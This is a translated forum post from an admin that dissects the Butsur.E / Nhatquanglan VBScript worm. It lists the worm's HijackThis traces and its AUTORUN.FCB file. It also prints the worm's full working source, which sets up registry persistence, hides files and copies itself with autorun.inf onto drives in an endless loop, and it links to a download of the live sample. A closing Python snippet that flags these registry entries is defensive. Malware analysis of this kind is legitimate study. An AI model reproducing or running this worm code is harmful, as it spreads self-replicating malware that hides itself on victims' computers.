Dissecting the innards of Butsur.E.worm, Nhatquanglan

Posted by SOUKPHATHAI (Admin) on Tue Mar 30, 2010 1:26 am


At first I was not going to post this here; I meant to put it in the Special room as usual, because I was afraid kids would use it for bad purposes... But for the sake of education I have put it here after all, so that those who want to learn can use it as a case study.

From HijackThis, only the part belonging to the virus:
Running processes:

F2 - REG:system.ini: Shell=Explorer.exe SCVHSOT.exe
O4 - HKLM\..\Run: [ACER-C96B16762D] C:\WINDOWS\SYSTEM32\ACER-C96B16762D.vbs
O4 - HKLM\..\Run: [winboot] wscript.exe /E:vbs C:\WINDOWS\boot.ini
O4 - HKLM\..\Run: [MGT_reg] C:\WINDOWS\.MGT_reg32.dll.vbs
O4 - HKLM\..\Run: [MS32DLL] \.MGT_reg32.dll.vbs
O4 - HKCU\..\Run: [protect_autorun] G:\Scan Virus\CPE17@KMUTT-Anti-Autorun.exe /start <--- having this installed does not help, because the virus uses the file AUTORUN.FCB instead of autorun.inf
O4 - HKCU\..\Run: [Yahoo Messengger] C:\WINDOWS\system32\SCVHSOT.exe
O4 - HKUS\S-1-5-18\..\Run: [Yahoo Messengger] C:\WINDOWS\system32\SCVHSOT.exe (User 'SYSTEM')
O7 - HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegedit=1



AUTORUN.FCB
[autorun]
shellexecute=wscript.exe .MGT_reg32.dll.vbs




.MGT_reg32.dll.vbs
'marker
'slow and silent (sas)1.0
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,cc,hm
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe .MGT_reg32.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
set rg = createobject("WScript.Shell")
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout","0"
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\.MGT_reg32.dll.vbs"
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\winboot","wscript.exe "&winpath&"\boot.ini"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun",0,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden",1,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt","1"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden","1"
dim text,size
size = mf.size
set text=mf.openastextstream(1,-2)
cc = text.readline
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\.MGT_reg32.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\.MGT_reg32.dll.vbs",2,true)
tf.write "'ker"&vbcrlf&mysource
tf.close
set tf = fs.getfile(winpath & "\.MGT_reg32.dll.vbs")
tf.attributes = 39
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\boot.ini")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\boot.ini",2,true)
tf.write "'ker"&vbcrlf&mysource
tf.close
set tf = fs.getfile(winpath & "\boot.ini")
tf.attributes = 39
if cc = "'mark" then
rg.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
end if
if cc = "'marker" then
rg.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
end if
do
for each flashdrive in fs.drives
hm="'mark"
If (flashdrive.drivetype=1 or flashdrive.drivetype=2) and flashdrive.path <> "A:" then
if(flashdrive.drivetype=2) then
hm = "'marker"
end if
set tf=fs.getfile(flashdrive.path &"\.MGT_reg32.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\.MGT_reg32.dll.vbs",2,true)
tf.write hm&vbcrlf&mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\.MGT_reg32.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout","0"
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MGT_reg",winpath&"\.MGT_reg32.dll.vbs"
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\winboot","wscript.exe /E:vbs "&winpath&"\boot.ini"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun",0,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden",1,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt","1"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden","1"
next
if cc <> "'mark" then
Wscript.sleep 10000
end if
loop while cc <> "'mark"

Download the virus for study purposes

http://file.citecclub.org/download.php?id=04B6EE57

pass:virus
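
An added example (not part of the original post): a small Python triage of the HijackThis entries quoted above. It flags the extra binary in the Shell value, Run entries that start script files or the script host, Run entries that reuse the Shell binary, and the DisableRegedit policy. The rule names, the function `triage` and the benign `ctfmon` line are assumptions made for illustration.

```python
import re

# Lines copied from the HijackThis excerpt in the post, plus one constructed
# benign entry (ctfmon) so the rules can be seen to leave normal items alone.
SAMPLE_LOG = r"""F2 - REG:system.ini: Shell=Explorer.exe SCVHSOT.exe
O4 - HKLM\..\Run: [ACER-C96B16762D] C:\WINDOWS\SYSTEM32\ACER-C96B16762D.vbs
O4 - HKLM\..\Run: [winboot] wscript.exe /E:vbs C:\WINDOWS\boot.ini
O4 - HKLM\..\Run: [MS32DLL] \.MGT_reg32.dll.vbs
O4 - HKLM\..\Run: [ctfmon] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [Yahoo Messengger] C:\WINDOWS\system32\SCVHSOT.exe
O7 - HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegedit=1
"""

SHELL_LINE = re.compile(r"^F2 - REG:system\.ini: Shell=(?P<val>.+)$", re.I)
RUN_LINE = re.compile(r"^O4 - \S+\\\.\.\\Run: \[(?P<name>[^\]]*)\] (?P<cmd>.+)$")
POLICY_LINE = re.compile(r"^O7 - .*\bDisableRegedit=1\b", re.I)
SCRIPT_HOST = re.compile(r"\b[wc]script(\.exe)?\b", re.I)
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf)\b", re.I)

def triage(log_text):
    """Return (rule, line) pairs for entries matching the patterns in the post."""
    lines = [l.strip() for l in log_text.splitlines() if l.strip()]
    findings, shell_extras = [], set()
    # Pass 1: the Shell value should name Explorer.exe only; keep any extras.
    for line in lines:
        m = SHELL_LINE.match(line)
        if m:
            extras = [p.lower() for p in m.group("val").split()
                      if p.lower() != "explorer.exe"]
            if extras:
                shell_extras.update(extras)
                findings.append(("shell-hijack", line))
    # Pass 2: autostart entries and the registry-editor lockout.
    for line in lines:
        m = RUN_LINE.match(line)
        if m:
            cmd = m.group("cmd")
            if SCRIPT_HOST.search(cmd) or SCRIPT_EXT.search(cmd):
                findings.append(("script-autostart", line))
            elif any(x in cmd.lower() for x in shell_extras):
                findings.append(("run-matches-shell-extra", line))
        elif POLICY_LINE.match(line):
            findings.append(("regedit-disabled", line))
    return findings

if __name__ == "__main__":
    for rule, line in triage(SAMPLE_LOG):
        print(f"{rule:24} {line}")
```

The Shell value is split on whitespace, so a legitimate shell path containing spaces would need quoting-aware parsing before this is used on real logs.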